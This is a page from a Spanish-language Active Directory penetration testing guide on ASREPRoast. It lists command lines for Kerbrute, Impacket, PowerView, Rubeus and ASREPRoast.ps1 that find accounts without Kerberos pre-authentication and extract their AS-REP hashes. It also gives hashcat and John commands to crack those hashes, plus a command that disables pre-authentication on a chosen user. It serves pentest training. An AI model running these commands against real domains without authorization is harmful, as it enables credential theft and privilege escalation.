🔵
Active Directory Penetration Testing
  • Inicio
  • General
    • Recursos de aprendizaje
    • Herramientas
  • Recolección de información y enumeración
    • Bypass protecciones PowerShell scripts
    • LLMNR/NBT-NS poisoning
    • Enumeración no autenticada
      • Enumeración de usuarios y grupos
      • Enumeración de política de contraseñas
    • Password spraying
    • Enumeración autenticada
      • BloodHound
      • Domain Name System (DNS)
      • Enumeración de dominios
      • Enumeración de usuarios, grupos y computadoras
      • Enumeración de recursos compartidos
      • Enumeración de política de contraseñas
      • Enumeración de Group Policy Object (GPO)
      • Enumeración de Access Control List (ACL)
      • Enumeración de relaciones de confianza de dominio
  • Movimiento lateral
    • User hunting
    • Microsoft SQL Server (MSSQL)
    • PowerShell remoting
    • Remote Desktop Protocol (RDP)
    • Server Message Block (SMB)
    • Windows Remote Management (WinRM)
    • Pass the Hash (PtH)
    • Pass the Ticket (PtT)
  • Escalamiento de privilegios de dominio
    • Configuraciones incorrectas
    • Credential dumping
    • Usuarios y grupos
    • ASREPRoast
    • Kerberoast
    • DCSync
    • Unconstrained delegation
    • Constrained delegation
  • Escalamiento de privilegios en relaciones de confianza de dominio
    • Kerberoast
    • Foreign group membership
    • SID History
  • Persistencia
    • Golden Ticket
    • Silver Ticket
    • Skeleton Key
    • Directory Services Restore Mode (DSRM)
  • Vulnerabilidades
    • NoPac
    • PrintNightmare
Con tecnología de GitBook
En esta página
  • Descripción
  • Linux/Unix
  • Kerbrute
  • Impacket
  • Hashcat
  • John the Ripper
  • Windows

¿Te fue útil?

  1. Escalamiento de privilegios de dominio

ASREPRoast

Descripción

Es posible obtener el Ticket Granting Ticket (TGT) para cualquier cuenta que tenga habilitada la configuración "Do not require Kerberos pre-authentication" (DONT_REQ_PREAUTH).

Linux/Unix

Enumeración de usuarios con DONT_REQ_PREAUTH habilitado.

Kerbrute

kerbrute userenum -d <ACME.LOCAL> --dc <IP-address-DC> <wordlists>
  • <wordlists> = ruta de wordlist de nombres de usuarios de dominio.

Impacket

GetNPUsers.py <ACME.LOCAL>/ -dc-ip <IP-address-DC> -no-pass -usersfile valid-ad-users.txt

Hashcat

Cracking de AS-REP.

hashcat -m 18200 as-rep.txt <path-wordlist>

John the Ripper

Cracking de AS-REP.

john as-rep.txt --format:krb5asrep --wordlist=<path-wordlist>

Windows

Enumeración de usuarios con DONT_REQ_PREAUTH habilitado.

# PowerView
Get-DomainUser -PreauthNotRequired | select SamAccountName, UserPrincipalName, UserAccountControl | fl

# Módulo ActiveDirectory PowerShell
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Obtención de AS-REP de usuario.

# Rubeus
.\Rubeus.exe asreproast /user:<user> /nowrap /format:hashcat

# ASREPRoast.ps1
Get-ASREPHash -UserName <user> -Verbose

Obtención de AS-REP de todos los usuarios.

# ASREPRoast.ps1
Invoke-ASREPRoast -Verbose

Habilitar configuración "Do not require Kerberos pre-authentication" (DONT_REQ_PREAUTH) para un usuario.

# PowerView
Set-DomainObject -Identity <user> -XOR @{useraccountcontrol=4194304} –Verbose
AnteriorUsuarios y gruposSiguienteKerberoast

Última actualización hace 2 años

¿Te fue útil?